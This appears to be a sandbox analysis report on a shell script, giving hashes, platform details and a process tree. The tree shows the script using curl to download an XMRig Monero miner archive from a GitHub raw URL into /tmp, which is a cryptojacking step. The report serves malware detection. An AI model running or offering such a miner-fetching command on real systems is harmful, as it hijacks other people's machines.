Analysis
-
max time kernel
300s -
max time network
897s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
01-07-2024 11:59
Static task
static1
Behavioral task
behavioral1
Sample
script.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
script.sh
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral3
Sample
script.sh
Resource
ubuntu2204-amd64-20240522.1-en
Behavioral task
behavioral4
Sample
script.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
script.sh
-
Size
8KB
-
MD5
97423634cc1762b2f010cb860e7fb47d
-
SHA1
2f50775e8fe9ab98a80f06d835c5874091bf0b3e
-
SHA256
d97530313d2423ba8c3e87ccd3d66e6cd77997d26bbb4d1dd2a5f32827dde8cd
-
SHA512
bd5279178f713edaca1754937a859fa41dbec1fdd15c8ad3cb11894142e389d97bf3ca7f0402c018a616053b1121650ed609498a4b34c4def829e02924f6de1f
-
SSDEEP
192:fFa1ZIJvH8czpCyzdpB3f1SAij8E3YUNvmTC8KfbmP/oYv0Yd:fEHexC+HSAHE3YUN+TC8SbmQUfd
Malware Config
Signatures
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 raw.githubusercontent.com 2 raw.githubusercontent.com
Processes
-
/tmp/script.sh/tmp/script.sh1⤵PID:1493
-
/usr/bin/cutcut -f1 -d.2⤵PID:1496
-
-
/usr/bin/nprocnproc2⤵PID:1497
-
-
/usr/bin/bcbc -l2⤵PID:1500
-
-
/usr/bin/curlcurl -L --progress-bar https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.tar.gz -o /tmp/xmrig.tar.gz2⤵PID:1501
-